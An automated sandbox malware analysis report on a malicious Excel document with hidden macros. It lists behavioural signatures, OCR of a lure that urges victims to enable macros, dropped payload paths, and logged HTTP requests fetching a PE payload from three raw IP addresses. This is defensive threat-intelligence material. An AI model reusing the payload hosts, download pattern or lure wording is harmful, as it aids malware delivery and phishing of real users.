Windows Analysis Report Compensation-2308017-09272021.xls

Overview

General Information

Sample Name: Compensation-2308017-09272021.xls
Analysis ID: 491573
MD5: 52b4fcf57e4fb524cf33503e8a5272ef
SHA1: d5b80e8ceaa81361da9ff6d18a4927dfd3b47d1a
SHA256: a5bc073043d0729f825df8302f425148ce8c65214a87094fe96fe9039ac7f088
Tags: xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.441003457.0000000002821000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW, 4_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW, 5_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW, 8_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000EAEB4 FindFirstFileW,FindNextFileW, 11_2_000EAEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1000AEB4 FindFirstFileW,FindNextFileW, 12_2_1000AEB4

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44466.7516903935[1].dat.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 33MB

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:02:56 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:02:59 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:03:00 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.441359204.0000000001DB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.439921319.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.451658912.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.448814500.0000000001C80000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.449319415.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat Jump to behavior
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Screenshot number: 4 Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd2.red
PE file has nameless sections
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Deletes files inside the Windows folder
Source: C:\Windows\System32\wbem\WMIADAP.exe File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h Jump to behavior
Creates files inside the system directory
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10016EB0 4_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10012346 4_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10011758 4_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10014FC0 4_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00096EB0 5_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00092346 5_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00091758 5_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00094FC0 5_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 8_2_005E2C41
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A 8_2_005E242A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 8_2_005E3726
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1424 8_2_005E1424
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1C5D 8_2_005E1C5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E34DA 8_2_005E34DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3073 8_2_005E3073
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E32EB 8_2_005E32EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E4162 8_2_005E4162
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005EB114 8_2_005EB114
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E4495 8_2_005E4495
